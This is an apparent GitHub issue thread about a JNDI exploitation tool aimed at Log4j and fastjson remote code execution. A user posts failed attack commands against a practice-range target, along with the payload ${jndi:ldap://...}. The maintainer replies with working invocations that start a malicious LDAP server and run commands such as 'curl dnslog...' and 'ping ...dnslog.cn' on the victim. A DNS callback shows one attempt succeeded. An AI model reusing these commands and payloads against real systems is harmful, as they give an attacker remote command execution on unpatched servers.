wyzxxz / jndi_tool

JNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Log4j 靶场漏洞检测失败

Asura88 opened this issue · comments

Log4j 靶场漏洞检测失败

image

[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.
[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.

默认的这个,只加了部分场景和最常见的payload利用方式,如果不成功,
启动下jndi服务,然后burp发下http请求尝试
java -cp jndi_tool.jar jndi.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn"
java -cp jndi_tool.jar jndi.LDAPRefServer 1099

靶场这个,是需要路径触发的,可以这样:
java -cp jndi_tool.jar jndi.log4j.HLDAPLog4j 121.40.166.141 80 "ping jnoizd.dnslog.cn" http://d63bb2586.lab.aqlab.cn/zkaq/log4jrce w=tomcat

返回
jnoizd.dnslog.cn | 59.63.230.105 | 2021-12-20 10:15:18